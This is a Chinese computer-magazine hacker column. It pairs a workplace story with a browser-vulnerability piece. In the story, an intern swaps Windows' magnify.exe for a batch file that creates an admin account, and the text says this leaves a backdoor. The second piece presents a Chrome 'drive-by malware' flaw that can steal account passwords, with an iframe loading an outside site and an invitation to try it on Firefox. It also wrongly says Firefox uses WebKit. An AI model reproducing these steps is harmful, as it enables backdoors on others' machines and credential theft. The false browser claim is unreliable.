第一节:电脑报第19期 G8版
黑客营 毒辣辣求职记(1) 和诸多大学毕业生一样,毒辣辣面临着就业的巨大压力,但毒辣辣又与普通大学生有所不同,他在大学课余时间学习了黑客技术。这些黑客技术会对他的求职之路产生哪些影响?运用这些黑客技术,毒辣辣能博得领导和同事的好感吗?能顺利入职成为公司正式的一员吗?通过对本系列的阅读,即使你毫无黑客基础,也可以掌握一些简单的黑客工具和黑客技巧,让你成为办公室内的电脑高手。毒辣辣求职记开演了! 连载地址:http://go.shudoo.com/g/hky.htm
初入职场立一功
故事主角:毒辣辣 其他人物:胖哥(老资格的同事) 主任(直接领导) 本期知识点:绕过系统登录验证 故事提要:在某知名公司实习的毒辣辣,第一天就等到了一个表现机会。主任电脑的系统登录密码离奇出错。如何清除系统登录密码呢?如何不用系统光盘,编程绕过了登录验证呢? 初来乍到 我,绰号毒辣辣,因喜好黑客技术、研究病毒得此名。此前,我一直沉迷于研究黑客技术,没有去找工作,可大四毕业的期限越来越近,我不能再等待了,必须爆发自己。我决定先找一家公司实习,力求通过实习期间的表现,增加与公司的双向沟通与了解,充分展现个人价值,最终实现曲线就业的目的。 经过反复筛选和积极联系争取,我如愿以偿地进入了某知名公司实习。第一天上班,我穿上新买的黑色西装,打上鲜红的领带,何等意气风发。在公司的会议室,主任接待了我和其他几名实习员工。 “欢迎你们!我们是一家正规的知名公司,拥有良好的企业文化和传统。你们虽然是实习生,但也要以正式员工的标准严格要求自己,这对你们的成长和进步十分重要。你们之中优秀者,将会在实习期结束时,优先获得成为正式员工的机会……” 主任的话很具有感染力和号召力,让我们几个实习生热血沸腾。身为一名天蝎男,我也难逃内向的命运,在心中琢磨怎么表态时,主任盯着我:“看简历,你计算机技术不错,就到公司的信息中心实习吧!信息中心的胖哥是我们的技术权威,你就先跟他吧,要珍惜机会、虚心学习!” “我一定好好干,干的好好的!”我中断了琢磨,结结巴巴地回答,老实说,言语表达不是我的强项,不知道会不会影响领导对我的印象,我纠结这个。 表现机会 胖哥是一个体重超过180斤的老员工——据说才进公司的时候只有120斤,稍有秃顶、脸圆圆的、看上去非常憨厚。这个上午,胖哥就让我刻个资料备份光盘,做了一个网线头,虽然这活技术含量不高,但我认认真真的完成了。 当我以为今天就这么浑浑噩噩地度过时,主任打来了电话:“胖子,我的笔记本电脑系统登录密码出错了( Windows XP),三点钟要开会,你快过来处理一下。” 情况紧急,胖哥急匆匆赶往主任的办公室,我想了一下也跟了上去。我到主人的办公室时,只听见主任十分着急地说道:“还没有搞定?半个小时后我开会就要用了!” “找一张系统光盘就可以解决问题。该死,我把系统光盘放哪了,我马上回去找找!” 胖哥有急匆匆离开主任的办公室,我鼓起勇气对主任说:“不用系统光盘,也可以解决这个问题” “真的?你来试试!” 我的方法是在电脑中新建一个用户,这样不但可以间接清除系统登录密码,还在笔记本电脑中留下了“后门”。迅速做到主任的台式机前,插入随身携带的闪存,然后下载了USBoot(见图),该工具可以把闪存变成一个系统启动盘。 我新建了一个文本文件,在里面输入以下代码: Net user hh 123/add Net localgroup administrators hh/add Exit 代码的意思是创建一个有系统管理员权限的账号,账号名为hh,密码为123。将该文本文件保存为.bat文件,然后利用压缩工具将该文件转化成可自解压的文件(magnify.exe),文件名必须改为magnify。
任务完成 时间一分一秒过去,主任十分焦急:“怎么样,能行么?” “马上就好,最多5分钟!”我自信满满地答到,虽然我不擅长语言表达,但有的是技术资本。我麻利地将闪存插入主任的笔记本电脑中,设置开机启动顺序为“USB”优先,系统成功进入DOS界面,在DOS界面中输入cd
Windows、cd
system32进入C:\ Windows\ system32,再输入copy E:\ magnify.exe
C:\ Windows\ system32\magnify.exe(E盘就是闪存盘)。 拔出闪存,重启系统,按下组合键“Windows+U”,激活自解压文件,创建新的系统登录账号,输入用户名hh和密码123。伴随着那熟悉的开机登录音乐,系统成功登录到桌面了。 “干得不错!”主任由衷地夸张我。 最后的事情就是删除原账号的密码,这对我来说就是小菜一碟。在清除原登录密码的过程中,我意外地发现笔记本电脑中有一个隐藏的账号,通过日志检查,发现该账号创建已经很长时间了。时间紧迫,我无法深入追究刘主任的登录密码失效是不是有人故意弄的,只好删除了隐藏的账号,却不想这样做无形中得罪了人……
职场新人注意事项 注意事项1:穿着要精神。每个公司企业不一样文化,要求也不一样,有的公司要求上班必须西装革履,有的公司对穿着没有要求,所以事先要做好充分调查。无论有没有要求,穿的精神都是必要的,可以给同事和领导留下好印象。本文中毒辣辣穿西装就是一个不错的选择。 注意事项2:要抓住一切机会表现自己。新人最需要的就是表现自己,让领导迅速的对自己有一个良好的印象,一旦碰到这样的机会,千万要抓住。本文中的毒辣辣就是抓住了表现机会获得了领导的好感。
注意事项3:态度要积极。新人初期的任务多是干一些杂活,难免要为老员工跑跑腿,不要抱怨,认真完成任务,给同事留下一个办事认真负责的好印象正所谓,态度决定一切。本文中的毒辣辣认真干杂活的态度值得肯定。
技术延伸 文章中用闪存绕过系统登录验证的方法并不常见,这样做相当于在别人的电脑中留下了后门,只需要简单的命令就可以远程连接别人的电脑,在里面为所欲为。常见的做法是,使用DOS下清除系统用户密码的工具Password Changer完成密码清除工作。 需要注意的是,直接在DOS界面中删除C:\Windows\system32\config下的SAM密码文件,这种方法适用于Windows 2000系统,不适用于Windows XP系统。如果条件允许的话,最好还是使用番茄花园之类的系统光盘中嵌入的清除密码功能,方便快捷。 交流互动
每期故事中的技术,我们都会在电脑报报官方论坛数动连线(http://www.shudoo.com)安全板块中,邀请黑客营的高手进行深入的挖掘,他们是在什么情况下使用这些黑客技术的,使用过程中可能会出现什么问题,应该如何解决,精彩不容错过!
上期的答案是不需要验证。有上万人通过论坛、邮件、QQ群和手机四条途径参与了竞猜,产生了一批幸运获奖者,获奖名单请登录http://go.shudoo.com/g/hky.htm查询。 技术题目:为什么文件名必须是magnify? 剧情题目:删除隐藏账号会给黑黑产生什么影响( 附上分析)? 想知道答案,请看黑黑求职记(2)。如果你想到答案了,请到http://go.shudoo.com/g/hky.htm留言或者发邮件到pcw-chendx@vip.sina.com,答对者将有机会获得我们送出的2GB防病毒闪存。 黑暗竞技场 传说,在云之彼端有一座黑暗竞技场,在竞技场里面可以随意施展黑客技术。每逢虎年,竞技场将打开大门,迎接新的勇士。来吧,来竞技场吧,来一展你的身手吧!在这里,你可以施展黑客技术;在这里,你可以与高手交流。Let’s go! Chrome挂马漏洞研究 漏洞的危害 本周,我们来研究一下Chrome浏览器挂马漏洞。利用该漏洞可以进行挂马,可以盗取用户的网游、邮箱、QQ、网银等账号和密码。除了挂马外,该漏洞还可以用来安装恶意插件赚取广告费,强迫用户访问黑客指定的网站赚取流量,甚至可以用来恶作剧。 漏洞的原理 Chrome浏览器为什么会出这个漏洞呢?经过电脑报安全团队的研究,发现漏洞产生的原因是Chrome浏览器的Webkit内核阅读器对视频模块检测过滤不严导致的。那该漏洞只有Chrome浏览器才有吗?通过实验,我们发现Opear浏览器也存在此漏洞。 漏洞的利用 我们提供一个简单的利用思路,先进入QQ空间,然后一篇发表日志(图1),http://www.07s1.cz.cc/1.htm网站是特制的页面。 页面中有一段这样的代码: <html> <script>alert(/virus loading...../)</script> </html> 效果就是弹一个弹窗,内容为virus loading.....(图2)。内容可以修改,例如写一个死循环代码,或者嵌入式挂马代码:<iframe src="http://www.07s1.cz.cc/1.htm" width="200" height="500">。 火狐浏览器同样采用Webkit内核,它会不会也有此漏洞呢?这个悬念就留给大家了!大家可以将自己的研究心得发送到电脑报官方论坛数动连线(http://bbs.shudoo.com)安全板块,也可以直接写信与小编交流,来信请发到pcw-chendx@vip.sina.com。每周我们都会挑出幸运者,赠送每人一份奖品。此外,还有机会在报纸上得到推荐。 本期奖品 本期奖品是安天木马防线KEY和USB连接器,奖品由安天提供,价值30元或300X币。
毒辣辣求职记 看腼腆的实习员工毒辣辣,如何用一些黑客小花招在办公室里面混得风生水起,泡妞、求职两不误! |